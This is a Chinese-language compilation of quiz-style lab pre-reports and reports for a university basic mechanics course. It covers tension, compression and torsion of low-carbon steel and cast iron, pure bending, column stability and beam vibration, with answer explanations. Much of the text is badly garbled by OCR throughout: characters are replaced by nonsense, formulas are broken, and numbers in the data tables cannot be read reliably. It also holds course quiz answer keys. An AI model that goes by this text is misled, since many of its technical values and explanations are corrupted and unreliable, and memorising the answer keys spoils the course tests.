第一篇:中南大学基础力学实验报告
中南大学基础力学实验报告整理
预习报告
材料的力学性质测定实验;静态应力测试实验 2.隹力导测童中,对干载苟和怫贰试杵几榔形状祁惭时.为握蓟懂的柞岌常期用 测膏法厂 对称 3.第一大题|上一大题| “F— 大饉 |最肩大题| aSSI E3 阳=载荷与其对应的响应值是线性关系,则载荷増宣与其对应的响应值壇宣也是线性关系 V” 4.||第一粗 I 上一大题 I 下一黄题 I 最后大题 I I ■靈 对于任何测量实验,加载方亲均可采用増量法。
5.灯琲脚辭郴测撚希雜城斑请仙瞅融填遵林躺浪踰旻磔△“鈴“
载荷 F(lcN)AL(tun)血増前(imi)200 0 52 0.25 300 0 77 O2S 400 1.05 0.26 500 1 31 0 25 600 1.56 AL平均霑量(an)0.26 载荷増量 AF(kN)100、拆占就訪应力汕试磯、掠和性测进灾監。
A/ = FL ~EA 1.试件长度 L Imm)100 试件横截面面和总(mm 2)200 弹性模量 E(GPa)200.拉压实验
1.■
< 鲫込岡醐度 堡低强应、J 醋刚度 j 彌昶和刚厦./ 11= 干 V L 「」‚ M 匡所亍曲应力-应娈曲统无论是冷乍硬化还杲冷怔对毡豁使材糾的屈尿极限提高了,但花同样的 用力水平下,诗作谯化知待作旺啟均使科斛审孫齐莹丈内 减小.因此冷作哽优和持■乍时效有肋于掘高柯料葩弓颐* 侣同时林料冈膺和崩之烽饥所頤在釆用胡应的工空席 村料的力学性第时’警拄禽平衛强度和刚度两方面的帑与 2.测定 E 的实验中謳加初级栽荷的目的是 • W 预执仪器 ♦ [B:
消除接独縫隙 [C] 豔件中施加预拉力 [D] 使弓形曲板变成平板 3.测定 E 的实验中,试件两端施加的载荷 ________
*M 应控制在比例极限叹内 [B] 应控制在屈服极限以内 [C] 应控制在强度极限以内 [D] 最后拉至试件破坏 4.~对料拉压力学性能尖验需要匚下的睛些仪器,设番和丄具』 甕簧秤、卷尺、钢扳尺、淤标卡尺”电子万能试验机、毎线器、万用恚.预週平«*s.i+ 算机 解*正询笞冥为!钢板尺,崎卡尺,电子万能试腔机」博机 钢板尺用来涮量试杵的标距.游标卡冗只辛测塾试件的直至电于万 t 逅力机用涨试件如鬆计鼻 机用忌自动 i 塚载苛和支形韋的关系曲践・ 5.|~~低战钢拉伸时的力学行为分为、、利 四个阶取
解-正血笞兵号 T | 弹柱阶段;屈服阶段・强化阶段「局部变形阶段 6.| 低碳钢拉伸时的三个重要的强度指标为 _____________、_______ 和 ______
7.I 低就钢拉伸时的两个重豊的望性扌旨标対 和
8.(1)在做材料的拉压力学性能实验时.试件的形状必须符合一定标准。
L.拉伸试件的横截面刑状 W 只首堤圆形 [B] 只眉堤正方形 K] 貝能是长方形 • [D1 所列三种均可(2)2 若佃蒔舸拉韩实验丢冃冒觀直的试件 t H 当权电匸 lUUnum 试件瑙截血的直径 ⑶ 3、压缩试件的形状应采用 [A] 球形 [B:
细长杆 * [C] 短柱 [D] 所列三种均可 解皐 [「正禍巻案为 歩忆斡的:^须做城轴托的用我,横竝面可惧是日旳或方羽,包拮止方世或长方形 <■ 2.11 确蓉衰拘; lOinr 或 2 五 110 圆也拦仰试件的傑(标距〕与直径之比必倾是⑺诫 1 泓 3.E^WdlC], 医为 IS 淞呻要歌覺巨犬锂区丈・田竝颜做成遇粗葩主眦 苫则采压与拉伸宴船捅價的试怡 岌 力启试件会发生穹誥.影响测试吐果.9.(1)解:正确答栗対二 比例极限;屈展极限;强度极限 解;正不角答案为; 伸长涎伸率;断面/■截面收缩率
11.丄 谢失圧缩时需要测量規溺台.【输入数据前面的编号,中 fS] 用英文的分号厂书开八在罠下魏据也 1 1, 3.5.?.9* 11.13.初载前试件的淞 加载惭试件的楼截面宜径 试梓两端羽载荷 加裁的遼度 弹性榛董 比咧板限戢荷 强馳眼载荷 2.皱坏后试件的柿腔 4.械坏治断口的最心宜控 S-试件在载荷件用飞的靈形量 8.卸载的谱度-0.横旬妥形因斂 11 屁報枫限载荷 11.刪试环爰門镒匿和紀度 1-低號钢拉曲时爲宴测量的数据有(扯 A 救魁 t 酣编号.牺用箋丈的芬毎匕“隔并)
o 1;2;3,4 :
5;fi;12;13
(2)
在以下裁据中,1.io^M 试吟的斬距 丸 破坏后就件日弼袒匚 3.M 栽丽试件前棧暂直直径 4.破坏后断匚的最小直径 5.试仔錦 的戟荷 氐试化在戟荷作用、的刃仏量 7.加载的連度 0,卸轨的理度 9” 理桂槿宜 10, 横冋变形因數 11.比刎極限载荷 12.屈胆根很軾尙 13.强龙樋隕戟荷 14.测试坷墳的说惟抑显段 2 “低就钢三缩时需爭贝量的数据有 1SP 虜据前饭的编号.中间用英文的分号碣开八 在以下数据中匚 1.力」樹氓件的标距 2 破坏右试件的标距 3.in 载前试件的機截面直径 4.破坏后虾口的最小直径 5.试件两端的载荷 氐试件在戟荷作用下的变无量 ”.柯载的速厘 s.卸討:的逗度 生弹性模量 10.榻向变形因数 11.比例械膿乾荷 L2.屈燃祓隈戟荷 强度桩限钱荷 14, 测试环境的溟度和显度 j~ 益祷铁拉伸片需郵幢的魏爲 ______________________
(输:数据前面的苗号,中间用敷的泸隔井)0
庄以匚数据也 1.3.加载前试件的标距 初益箭试件的橫截而直空 试件商端的载苛 加栽的速曆 弾件僅量 比例极限戢荷 强宵极限計„荷 2.槪坏洁试件的标崔 4.破坏后断口曲禺八肓径 乩试件仕载荷件用飞的吏形童 横向变形丙数 S.10.12.14.测试环境的逼度和湿度(3)
3.
对料凶扭压力学性能实验脸也不测莹强怪環量和後向变羽因數・ L.正鯛薬为=丄、2.趴 4、阳酥尿 13, 號诚柯扭毎的时候有比例概限虺样个 J& 标,恒是比例极限是应力■破曲线由直绒拜入曲细购界点, 也超】」耘中这一点的乞置衬一难吩协・因此 H 詩运忙竝忖实猛中一般并不耻量土例和隈,2.正确替泰知儿取 6.12.压疇试件足个姮园桂试件「试件上役酉應,而且庇痛其验最后脣试件圧堀风 r-个就笊・井蜓有容 忧符压确議所队无法测试理坏启的桧度.当魅这样的话加栽前的长廈也就橙有必蓼测门另外压缩丈验也 不捌團度槻限* 久匚确笞案为 t 氐氐 L3« 彼糕是 t 中拉佣至腹坏也环誉夏生匝显的变瑕 園此对干镐钱来骼一骰不去测量与变刑有 戋的敎扌彰又由于恃扶殺有明县的压月册段‛因此巴不需更记最其尼毘橇限的栽荷吨、J.正确答案为 1 3、5.13, 同人 实验报告 1.咄嵌训拉阳时的应: t 应娈曲线为 辭:正髻蠶皤脆性材料’抗拉强度非常低,而且应力应变曲线中几乎没有直线段,3.
O(1)
* a ⑵ f O ⑶ ° O--£(4)“也(])
C ⑵
[C ⑶
[D(4)
舐 二确答冥为⑷.低纏钢整一种同时具有很蛊的强度和良对的延展性的塑性村粧 从开妁 C 莪到是终的.低躅瞒 应刀应变曲线叢现出開县比线薛生昌灵强化札吕部变开獲 IM 必职如下图肾示=
粘正确吾来为⑹.低礙钢商湖的力学 1 鐵弓拉佛时的基本相同*它的应力应变曲姨同样有直战驗同样也可以爭 屈刃刍筋,帀且压缩时的屈服枫限弓拉侔时的風序砺展基石相同.4.「罚栈圧痛叮的应力应变曲縛为
[A]⑴
[B] ⑵
LCJ⑶ * 血⑷
J L 舲耒* LDh 戚庄瘩时应力应变曲线的特点也很明昆 百先几乎巡百直斑^而且抗压强黄很髙,誉至超过 f 碱 钢拉伸时的强匱极限* 5.底幽细应丿 J-应交凶娄如因厉示.当 I 山载至心点石幵诒卸戟.则正诵叢丹卩载规律対路径星 ____________________
沮 1 血 “⑻* 〔二】
w 0 〕» 解,匚齡栗为[BK 当村料竟力进入强化辭段后,女课将裁荷趣渤却到笔 则在这个卸戟帥过程中,材料的殛力-应变 曲縉并字沿感来加载约路崗烈从阑 m 再从阳到原吊而是从碉按阳与螂单性阶段的直线段基斗平讦的规衽博载荷禮为象朗目到说。
6.7.
惋鄴 I 的应力-应变曲绒如飞囹倚亍「则正确親示冷咋便化现象的齬径为 ⑷ M&e ⑹
oabc • Cv] fhtf “1 dbe 解;L 抽待案対 th 诗作硬化是肿赁村斜寺门也、昭饰段后卸载 严片匚-日 1 社,廿时祐斗陆时縄弾件阶衆耳 fifiifiAWt 阶段.而没有明显的風服台阶,I 比后村卸 4 按琼疗来初强经过逞化阶段,直至帚后就 坏*
低碾钢的应力-应变曲纯? ITT 图厉示,耻工血蛊壬沆 LIT 嫂迎象的路径是 山 oabf * 佗] cbf 叩 dbf [D] °辰 臨
正蓿苔案为[旳, 净作时雄拘吏郴授力迸人强化阶段甘卸轨摑置一段时间后冉如载・此时商料的线理哇阶屋片 虫帐,而且屈服台商明丑禹語 妇虚缕 M 茄示・迸入强化阶段后,C Y;J-应交曲结将技照与尿线大致平行的规律通过強化阶股.宣至最螳械如 8.I 低廡啊拉林圭融坏时肛口的形恸 _______________ ‚ 囲 d 厂 1 ⑹ C^)
解:回赌宪为[小 低疇聽一神具宿良娇延展性的矍性村料,村料受力之后軸沪生明显的列俱財逬入局理 B :
阶段后 试■件中部匕陌瓏」畑、:檢理更谨潮收瘋 直至厳后視拉断.所肉 W 后斷口的横界面尺寸比 匣始尺中 I 探氛币且断匚处细我一八像杯子底部的琢此所以乂称‚杯状”断 EL
屈 LILI
9.
至礦坏时断 Tl 的於状为 [Al
解:王而爸桌为 [ [CJ.加驚麟盼料展力取鬧・试件道到最环对止戦啊的却瞅铸铁 10.低硃钢庄缩莖破坏 E 寸试疇的形状角 ________
w也 • CE1
昶;正确洱案为[对。
很跖耐氏琴试“上日枉一由「站隠 种远辰性 I 传艮好矿至性荷轧 所门当机頂丈进 ,“尼压附取后,试卅稱产生明显的塑性娈形,长度方向袖压無.横向向四盾恭族由干试件与压力头之间 辰白艮丈 ft 瞬擦空所関誰枉匚工 71 士阳振觥面胃近的模习刃 T 賈羽;注刊珂,凹-西李隹惩 EI 柱殳 咸了一个中间和、两头细的張臥
11.
菇篡乐编辜讯坏带肝口的电壮询
铸铁壹吕时会表规岀一定程度的塑性,最后沿着与轴线大约成铀〖 55* 倾角的斜 葩面衣三谱珀両砸圮「如左图所示° L 杠料© J-应芟仙战屮的应丿収称/由乂应力,它至出社件兰到的抽匂拉丿虑以 L A ] 加载前试的和始面积 [B1 加载寸程中試件楼截湎的即时面积 IC1 拉断后试件断 ZI 的面和 [D1 初贻面和和断 ZI 面觀的平均谄 关于材料的应力-应变曲线° Z 低碳钢拉伸时再义应力比试件横截面上的实际应* ⑶ 第一夭题 1 上一大题 1 下一犬题 最后大题 用 T 邇|上一小题| <—.|-宀| 1 暮頃
关于材料的应力-应变曲绻 j~ “柚碳钢拉伸时用名义应力代替实际应力杲偏于安全的°LBJ om ♦ UJ
第一大:题上一大题|下一大题|最后犬题| 第一彳违 上一小题| T— 小题|最后小题| 解;正确苔裳为【 Dh
解:
1.正确电 [B] [C] LDJ 2-正融 的初 3.止瞬 擀度耳 操为 [Al.应力.但足苗 时面和杲很“删 越断石宾性 4H 牲比较好的■+狎 的盟时面頼憂/ 退斗方案意义” 争案备错失 山于F 算占 赵 时茴戻肯走 止菌。
吴強电舸的是彳 瑚是偏于妥全 Mu 或过程的毎一个瞬间试 f| 横劃:面的即 3:0-那幺就能谓到试楓横戳面上的夹陽 u 载过程中.试件被妾樂在拉力机上受埶拉力 KO ・ 在这种情况下试件横截面的即 幢的・ 〕的面鯉可以攔鲁的.而口切载姑列 s 大泉也要亦量左 r 数据,桓是对「妙延显 驚如确乩拉断时断口 ^1^00.比杖处百丸 f 口实验过碟屮〔发生局諛形前)
疇瓠用遽个面和怜算横赴面二的应力磁坏程做 R 明确.帀且迭琐©的不利影响“仍然存在.功时采用的是试件受力之前的初姑面积,诫件受力乏宕檯截面面租昵 N 因此试件 屜过程中弋件懂竝面的实环面和耳 国此得至怕坤丈切 1 肯定比丈际应丿卜儿 脚的飆,用较小的塔义应力竹普买血应力.使制料的强度有所降低,遠从设卄的 的』諒;际的强蔑茗于得到的和所采用的名义应力、1 “低碳钢和铸铁的押伸实唏 单址 长度:皿叫 th k5, 应力:
MPa
庫 皓 低 碳 钢 坯 □祷 柱 d= Q 片 Sffi/ d=
A
、‚
IAQ
几二 1 ■> >u “••
F 尸
«JZ F、-
u 对/ 右-耳 45-■“"
丄匚 in M L
A=
A=
C il T7
资料 结果
。厂
町二 Jim x J55 / ^b= 142 丿 6(%} 2 工歸
i4 九)JT? JT4
E= 1«064 :
Kd 1
A= — F £i-L 8-―-— < 100% A-A.叶一-—冥 100 %
三、扭转 预习报告 1.溺田 th 旳买迪中购织轼倚旳目罚圮 禺庭传陀謫障 圧试往甬弼]口协拉力 使弓形曲梅克成平檢 :正昭案笑泡]和任 h 本实验芟测星仪器包含了电阻应交化 电阻应变俛 4 神电弋谩邕 电子元杵经过通电预懑可哄提高 灵駁度和呗试箱度「 另加 本冥验王要適过删量试件竟力后发主质微小变用丰‛頁杆牡押性横量和瓚向矍能囚题 为了料 曲测量试件炭生的 檄小换
就必须保证祷屋誥与被测试件琴畜房 kt 井且竝同步的更羽和 位槪
因此 施扫板級荻荷町臥港磺恒感器与被測试件之闾可能存在的縫隙,确保二看紧讎梓.提髙测靖臬的舉确 」性” 2.洌竝的舞中,试件浙端期 U 的載险 • [A] 应控制在比闵极限仗内 LB :
应竝制在庄垠板恨以內 [C1 应控制在强雇极限収内 LDj 最启拉亡试件馥坏 駆;正确笞案対[山 0 弼性桶重是对料立铁卿性牯围內工柞时应力与应变之间册比例至毅,超翌戈弭性的范圉之后材料的应 力应变关泵讲人了付戲代态.对于働瑚钢这样的材料来孤 这个时僻的应力与应亨訥关系已径不能删 豪性植量的大小了‛对二弼性桓酣测宇邦赏讲就段有:意乂了.而级弓唯由段的最高巨就是城顺限.因此实验中所甬仙的去苟濮须倍干材划的 tt 侧极限,以保证村料在线徑性的范囤内工怅‚ 3.扫轻耳骗霁裝使用以下的哪些仪器、设奋和 T 具:
百分表、总尺“ 钢校尺・游标卡尺、电子万能试脸机、扭转试验机、狂转实验仪 s 万用丧.电阻应变仪,區数记录仪(答杲之闾用芙文的分号‚‚隔开)尺;訊玮试验机 4.I 材料的拉压弹性模量厶 切变模量 G 和横向变形因数¥之间的关系是 倚:三者之间的关系是: 厂— E 2(l+v)5.实儿、圓疏的直径为久 则逐匮轴横畀面的桩惯 It 圭如.1E 转觀面乗数歼 =^Z
极惯性矩和扭转截面系数分别为;
6.扭转实验测定切变模量 G 中采用 —法减少测量误差口 7.|每一级测定切变樓量的计算公式是 G-O
A77 】
pg 实验报告 1.嵋怛斟丄受图示外力佩勺作用至琏坏・则断口的相位宣为
• LAJ 1-1^ DB] 2-应 CC] 3-濒 ⑹4 一啟 解:正确管翼卡「切「 将殘資把破坏是耳匸曲。斜蒂面上的拉应力趣出了锈轶的抗拉强芨适庙的』桅捋木題中刮轴袁劉卜力 偎作用的方向.可以判断出在垂直于 1 ■俄的有向上有拉应 R 的作尿 因此那影沿着 1T 绒所给出的迪 位背師幵” 2.(1)对于低碳钢的扭转实脸。
[B]| [C](2)[C] [D] 3.(1)横截面上的拉应力超过了材料抗拉强度 橫截面上的切应力超过了材料抗剪强度 拧的斜截面上的拉应力超过了材料的抗拉强度 収的斜截面上的切应力超过了材料的抗剪强度 2・ 导致扭转械坏的原因为 [AJ • »] [C] [D] 屛 L 正鹤集为 LDh 2.正漏级!園° 山】
fil 栢賢出时槓截丙丄凌有正应力.fCl 的和哉面上存茁苛拉应力,但是嗚碳舸附抗拉肚宝还呈比较高的“所以在斜裁丽上的拉应力达刮 恬瞒邹的択拉强蔑之師欖截面上的烈祥切应力已经达 5(1 了低味钢姑抗隣度.所以还不至于沿着 b 的斜截直将试呻拉酥 ⑹拧的糾茁面卜存存有切应打戸杲空个切应力爭比權裁面上的幻応力小一半& 1.扭转至破坏后断□的形狀为: 1.扭转至破坏后断口的形状拘 __________
i 对于禱铁的扭转实脸。
(2)
2・ 导致扭转破坏的原因为。
[A] 横截面上的拉应力超过了村料抗拉强度 [B] 横截面上的切应力超过了材料抗剪强度 • [« 45° 的斜截面上的拉应力超过了村料的抗拉强度 | 5] 的斜截面上的切应力超过了材料的抗剪强度 斛.1.正确曹索为仙 2.正确答案为 Hh 铸铁却磁坏頁穽杲拉劭的* [扣圆鮭頁扭时横哉页上没有正应力* [B] 锈铁的还是貝戶定的抗卵暹度*在横截面上的切应力达到铸铁的抗醛度之前.斜鼠面上的眩应頁 已毘达到了舗铁的抗拉强度.因此券铁罰日破坏不沿者横截面將试件朗眛 协] 4 丁 瞬權面上存在有圻应九題这牛切应力針绷荀面上的切应力还要小一半,刮頃不可能是 由于能截面卜的切应力将铸扶试杵尊郭 4.实验报告 2 “低碳钢和铸铁的扭转实酚 单位匕 KM= muj r 力 1 匕斗皿应力:
MP 酎謝据 低 碳 訓 灰 1 丨 祷 慣 d-I** lift X” d= 1? J 58329 丁产 实脸资料 墾常第臭 畑.妙 KQ 1O K Z J- 陷卷肯扌护删)「 W J 啊“祚严 5.低碳钢切变模量测定实验报告 L … …‚ -------------------------------------------------- a= 12mm 匸 100 mm 载荷 T(Nm)标距扭角谨数卩((°)标距扭角谆数差 A 仍(°)切变模量 G](GPa)15 021 血 354 833p^ 25 n S64 n 36S / * 80.13^ 72.63 ,X 0.932 ___________ L3b~ ___________________ 切变模量平均值 G(GPa) 0-382J.0^6 78.31 Ml 四“纯弯曲实验 预习报告 1.、I 它纯直乗电删卖验山施加河鐵荷的目胡呈 _________________ ・ ♦ L A ] 预热仪誥 • EE] 犢陰接昨隙 [C] 在试件中施初预竝力 / | 山]便吐阻应变昕生初逮故./ 本峯盟的测量何器包含了氐阻宜变 tc 电固应匪仅是一种电气谟氤氐于元件疑过适电濟冋 0 探高 灵輪厮盹试桔取 另外.点实验主荡通讨对称加载来藏需純弯集段・因曲如载点;的植艺、烦短梨在主粱上的检置至关 重要,通过施加初晞载荷可哄对上述位査进行对淮和调整,确棵紧密接鯉利提高制瞬果的淮确性.2.在纯弯梁电测实验中采用分级加载的目的是— 阖模拟静载的效果 [B] 消除温度变化造成的测试误差 • [C] 鞘除电阻应变仪的初读数造成误差 [B] 将载荷控制在线弹性的工作范围之内 押「正硝笆薬苦 [ch 加裁有两种方朮 沖杲从零幵抽一直如到创栽翻険值,撚后词膵应的洌试裁攝 另一种是将 刪试躺等分为若干魅 b —述只如谟中一级载荷.最红加到设计載荷的红值。 由于銭应变与載荷之闾是幾性的耒系,SP.e=kF 耳撚线应变轴増塾与社商的塔量工间也是成幽性关系的*即 I 他二住 AF 因肥釆坤分级^载的亦案得到的测试结果尊效皈映了应变与載荷之即的关融 但是采用分議加载有它的好处,它可则 m 电砸应变仪 e 没有严梅调雪貢喩的初谅数对测试结果的影 札 采用方皱加載的万乘之后迂?初读数我補诚掉了” 令于静载加问趣.单所-礼同的 F 頷如载朋凉莖只看.证托足獗横脱静载的效果*而片矜中实 际的加载过程是通过手工枫加戟轮器耳賓呱圧,加载的速度不可能汰快,因此基市上就是静裁审方武.3.厂 在純弯梁电测实脸中温度补偿片的作用是 ___________。 U] 消除环境温度对材料力学性能的影响 • [B] 消除环境温度的变化对测试结果淮确性的干扰 [C] 消除 环境温 度的变化对电阻应变仪的影响 [D] 涓除环境温度的变化对预调平衛箱的影响 电测■轴昱通谊跟陥和搞捉应更片上电阻塑电租的戛忆来瘵测点外鬱小的蚪描号轉換感电^号益 行测量和显示’如果殴片上电阴童的同阻平是由于处刀产主前变形引起的,而是由于混度交临 1 成 e® 胱冷晞引赶的,那么刮试结果自然合竟到下扰・ 洞萄卜偿片的呻瞄谋让它与删点;处的应变片处于同一个混庫场轧二着的电阴揶靖徉境温度变牝 作同步的弯仏 幷且特洞度补偿片接人删点的同一亍再斷耆电桥中、这样就可践诵讨电桥的平衝冃訓洁除 环境逼度的対 t 幌黒准确 t± 田影龈 [A] 加武前谓畫沿有什么臥只有在加载之后确保了加载部佇与朮裁点之间的皤戢陀之石调零才 有駆 ⑵和 5]毎絃载荷读数完毕前或后调零的話分级岳奩的僧用效課就不龍连续黑加了,谊样就无注测 得各級裁荷柞用下测廉的应吏普了‛ 5.在纯徑栗电观具崟中冃丄 I 」注观试站果爪‚终性“规律约足 _______________ O « [A] 冋一明点的播应吏左不同盘苛作冏下的比例戋浆 不嗣滋旳线应变在直一颤栽耳矗毎匸沿算鸟专⑸上的分帝规律 c] 甕竝和旻 E[ZM 点线应旻羽正更关%和丼称性 山中性昙处測出的线应变呈習按逬二雲、/ 診正确答嘉初拟氏 c 和山 本題四亍选爾別的內容是检查制试绪杲的策绷 T 规律药冋方瓦 耳中 LA2M 的呆时料本島的级 弹杜的规律“乔其金三个选项检犯他呈饋应畫豳高度方向线也吏化的觇年“ 6.在弯扭组合实验中,圆轴下表面测点处包含橫截面和径向截面的应力状态为 辂 正磺答案为圧]・ 狈星戳面上駄育茸矩又荷站护.在诩矩柞用下握截面上曹立士妞特切应力.所以[口和 [D] 肯定*对, 又由于删量截面受 SV 的奇矩使圖轴门卜祁空払 下部壹販 因 11 週轴 F 表面测点处由弯範弓血的 IF^t 是压应力’故选项 [PJ 是正瑚的.♦ EB] [C] tt] it 匏匡绽由卯爭稔山測也谨凹“帖衣”的工电庐谨 < L L 豹秋前 ♦ Cfc 力 nWM肓 rc 毎圾軾苛谨数无虚前 ED 每躱栽药融完毕后 / 1 L”.] 4.解 T 正荊笞黑为 [E]・ [Bl ♦ [Cl [D] 8 9 aw 荊同 能相司 能阻口 I 柚曲县劇卜便片的元件应■> 试件羽 K負犯 E 试件 MF 纠射 E 同 试竹射休私祗曰 与删 与诚“ 右彼测试弁苗线.荒胀丢數.桁匠 _ r -_ 希除删 U 试件由于泯厳化产生的交形对测试 原则上讲只更选帰綢期^翹与被训试件栩同的尉料 R 呵,但宜 Ft 站弓破测试「— 片巳 应空片虽洪是 T 申电气帀件.怛是粘贴阖财卜偿片的材料与官的电气性能无 r-涓展补宦片的作 RK 苴乍为刑试时珂的 詰卑的屋响....__ 和谓束市眾国 i 砧制廂 i 卜偿 ⑻涓廈补偿片也是破广」 关 0 c 潟葡除片自懸鯉封与逞度和导热性能有并.们爭准确地讲盲祎稲关的杲村料越胀祚帰的件能 „也 黑正确卷豕 Muh r 用应变片进存的邑剧技术酗量的星试件在外力柞用下产生的线应变.它与常杵的尺寸祖:有宜接关甌 币加 I 陽帰的绝对变 H 遣 2 甲始尺寸有关.咱呆相对更张量就口曲甘尺寸沒苕耒系了「 粘鮎盅虞补偿片的元仁应 i 堆.与粧損h 科彳冃石 爭腳说件耳电 与檢側试件导姗 与襪测试伴容重相同 己祯答累为四“ 际然说是在中性轴上,那么横戟面卜別点处就段有由晋矩引起的蛮曲正应力.所 IXRWEC] 是王确的” 在吧严 圆轴*性牠啊却辿吐舍槓到国和迳颅談叵的应打状态加 4. 实验报告 1.在正弯矩的作用下弯曲正应力沿梁喜的分布规律是.〔 1)⑵ ⑶ ⑷ ♦ [A](1)[B] ⑵ [C] ⑶ roi⑷ 解:正确答案为 [<L 正弯矩是指使梁下部纤维受拉、上部纤维竟圧的弯匡所以正确答案应该为[从| 2._ ~~口 “iiS更濒得的纵旬住应变不为酗廉因豆 ______________-[A] 尢耿團式不准昭.导致主谨的测 X 段不是虹电染 [旳临阻辽仪谡右精锚诅零 [C] 旌加亍初蚩程嫡 *[D1 中性层处的应变曲鵬的趨不准雷 拭理逹上苗中性慝是竟弯梅件内际不竟拉乜不竞压的一个■特殊层面.但冥益当中旳冥测结果是中璐 戻苗纵向践 g 行籽不尊干聲、而令有一个比转小曲曲憤,亘疔固午壽中畔层站丙变点占贴的仃育不 准,导敦啜应交片测存的螂不是口性层处附極变‛ ui 兀栽帝式不頫 1 将春导致測试截面卜的誉菲韦炭牛娈仕・存旱不胃测试梁舟幕香皋纯含煙取以乃 礙社商二的弯矩等于養少.中性层处的纵向瞰应芟和正应力都应该为零所臥它不是适成中性层处测 得的汕旬线应变不为镉慎因。 ⑻段有精确词零会使彳号电阻应变俱有一个初锻駆但咼本宾膛采同读懿毒来谢亍计算,嗨载荷作用下 甘丈训植中帶冃含初礒数,却碱?后仿府觀 1 零.毎认它■也不具诰直中桂层处测得的輔我冋娈不対 零的月主 h 口捕抽初議宛荷的影响与时中电阻应变仪卷有闻蹄零的影响是类似皱所以它也不是苣成中唯层处 删得的纵向统应变不为零的原邑> 3.TU1 衣虧;■■版 Wtfih 九 /JKM-B » wyS Iit« 用 Zh Mrs 畑」 畑] 別 a *1 邸 抽 =5 : k-/ V -5.5ft / F JT _ 皿丿 * J *巴/ ■.M X 刑 U 坐# 巴/ --------------- ■15 / ---------------------h— Jii-0 ■-;»彳 / W / 血 / » / b — 謝 1 皿 T-fb^hH ■■C3?^ STI / 丿 JJI / y 7.0 / “丿 F/ A T® «-4 / -33.7 U 53 ■4S.7 2.7 50 7 单位:内力増童: Nm 应力: MPa^ 应夷: 嚴 轉崗 -好何 学-乎如亘 25^/0 4$—^5 打 T G I M2M ffl 23 a2 FI ■R.9 歧 3 C?J 主瞻方卑紬當 F J J 4i6 屛 工 3 ■ff2 o3 __________ .7.4 五.压杆预习报告: 1.I 关于长度因 数必 正确说注 ______________________ * 凶其它条件相同 B 拗束越强,捉越大 >[B] 耳它荣件相同时约束越怪,M越小 口其它条件相同阪越大,压杆的矣度越小 血 苴它条件相冋趾越大,压杆的植主性越妹 解正确答案为 [Bh.—p(MT M 约束的强扇与‚的关系可以从卡度因数表中去査.[CJ 从上面的第二个公就可以看岀,分亍上的大 [D] 从上面的第一个公式可以看岀,分母上的谧大,5../-■Z 2. 关 T 柔度几正确的说搓是 辭「正站案为[味 ⑷ 约耒越琶:度因熱越小,曰上面的第三个公式可以看出,此时桌勢報小。 [B] 上直的第三个必式可以看岀,分子二的?越大,压杆的柔度找大,故本选顶星正碗的.LCJ 从上面的第三个公试皿以看出,能够反映横截面粗络的慣性半径 f 越大.柔度越叽 [D1 从卜面的第二个公式可臥看岀.柔度 与压杆材料的弹性模量厮关。 3.关亠压科檯定性.正碓的税法是.耳它条件隹同时 x 越丸・压杆旳稳定性轉呼 垂让欧拉理论可朗 应使压杆笊柔度进尽可直汰 其它条件相同时轴向压力越大,临畀力越高 hE TF z [&] U 上画的第二个公式可以看出,务毋上的 2 越丸.压杆的临界应力越小.僦帘越差* [B1 压杆的黑変越弋・说明压杆越细瓠临界应力越低,屈一点从上面的第二伞公式也可以看出.这样埶可以便柑料仍处干绒弹性阶段*只更満足殴拉理论就是有敢的& [C 】和 LD] 临界力是压杆自身的 F 力学炀澹标*就懺许用应力⑹是材料曲才学性能指持 祐 他们为外力 是踊 关系的.4.I~~ 在以下所列的仪器设备中,压杆穏 定实验 所需要的是.电子万能试验机,双向引伸计.压杆稳定试验台,百分表,数字测力仪*计算机 口 ’正口本”压杆稳定试验台;数字测力仪和计算机 5.~武礁球』:狡主的山已 具横前面如下图所示 F 機压杆失程时,横哉面对中性轴的噌哼半径戸LAJ 苴它榮件相匠时约克趣强,越丈 [C] 其它条件相同时昼璘旨 苴它条件相同时圧■fl 也粗,丄越犬 工] 其它条件相辰时 E越大,/■越大 卬] 其它条件相同时输向压力越丸临界力越小 陳在纟竦袭坤构冋的蒂况瓦压杆头榕帶啸刼面二的时限 L 因止礦截商詞 4 性轴的團兰半劭 bh‘ 6.已知其逼丐匚心広朴的总度知*横截而旳怕性矩如,<廈因敢为⑴ 豺料的琴件惶童为芒・則且欧拉 临界力 F C y= + 答 PU 答案幵 T ^EI 7.已知某蛙揀中心压杆的长度为 A 植截茴的惶性半径为 h 快廈因數为血则该:圧杆的柔度 : 二 皆:压杆的柔度为’ 8.解 M 正鶴笞冥为, 4 傑 园为中点増加妁柬前.压杆为两端蛙的压杆.卄鼻輕废为心压杆的中点増俎纹朿民 竺垠压杆分 威了上下两淋由 1 ■中闾的欽吏 F.氓制了專截面的水平恆篠漫有限制该杳面贰坯瓠所叹每一段都相 巧干—标两鋸转古茁馬杆.口長苴计算吒席只石原来的一¥* F : /2.此时藝吳圧杆的临畀 +1 就 h 苴巾干 視杆件的临界力相笥由于豌拉临界力与计算长度的平方赧比.因毗增力哟車后盞艮压杆的临界力増 加创豆 K 的 4 倍*12 =-^= ~bh~ ① =0.J 77mm 6. 实验报告 1.实验报告 弹性压杆稳罡实醴 单位,式屋,at— 力-X, 坤性枕蚩已 cm 釣克类型 长度系数甘 H 号长度 L : nmi) E ; GPd) /)JWML 力 FJZ.凡广行 J x 100 3< J F fr 十常白分昏门 两端铁支 ] J94 210 UJ 115 177 1 U —端狡芟 另端固足 歉 37B 210 J.J 34Q 394 13 70 两靖固定 03 210 15-5 733 323 7.K 两端锁支 哥口间锤 1 1ST 21 :3 71Q 7r 2 El z 细怅压杆的欧拉临界为‘化厂(竝 f 6• 简支梁 预习报告 1.面支梁横向振动固有频率若 /iWOHs 则丿孑二 HZ。-180 2.4m*目砂别法判断魅吋.齋信号满动体■拉稔楼号幣輔拓團里 出姑八 橢园 — 3.曲利性北刊洼郭 ar 上柝时,轍标僖号三据制体速麻怙 m 的玉萨址團昙(埴文字)“ 严直线 4.北览宿位日凤铠判莎其振时,嗨拆辰与振动朴 11 」速底侶号例全詐銅盟昙一(填 文 字) “ |物体的固有硕率只有 1 个。 物体的共振频率就是物体的固有频率。 P 3. 实验报告 1.简支舉幹阶周有频率的测屋买验报告 固有频率 71(Hz)舟⑴町 現・(文字) P 数直 现象(文字)| 粗值刈別袪 4B.7 KA a 槽位判别沬 4S.S 蹄 @1 1947 晟度 4S7 歸直线 192 U 斜直绪 , 加速度 48 C Bl i 正枢 七 • 数字模拟 预习报告 1.液压万能试验机指针度盘的分辨力为;[扎]扌蒜度盘上的最小刻度,&]楷示度盘上指针所指示值的理; [C] 扌包度盘上的最小刻度的一半 i [D] 度盘上的最夫动度<■ 解,正确选项 C 